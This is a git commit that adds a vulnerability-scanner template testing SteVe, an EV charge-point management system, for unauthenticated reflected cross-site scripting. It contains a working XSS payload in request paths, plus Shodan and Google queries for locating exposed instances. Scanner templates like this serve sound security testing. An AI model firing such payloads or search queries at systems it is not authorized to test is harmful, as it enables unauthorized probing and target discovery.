Create steve-xss-noauth.yaml

patch-1
clem9669 2022-10-26 16:09:38 +00:00 committed by GitHub
parent e65da57936
commit 2a20e69976
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: steve-xss-noauth
info:
name: SteVe - Cross-Site Scripting no auth
author: clem9669
severity: medium
description: The aim of SteVe is to support the deployment and popularity of electric mobility. SteVe provides basic functions for the administration of charge points.
reference:
- https://github.com/steve-community/steve
classification:
cwe-id: CWE-79
metadata:
shodan-query: http.title:"SteVe - Steckdosenverwaltung"
google-query: intitle:"SteVe - Steckdosenverwaltung"
tags: xss
requests:
- method: GET
path:
- '{{BaseURL}}/steve/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
- '{{BaseURL}}/services/"%3E%3Cscript%3Ealert(document.domain)%3C/script%3E/services/'
stop-at-first-match: true
redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
- type: word
words:
- "text/html"
part: header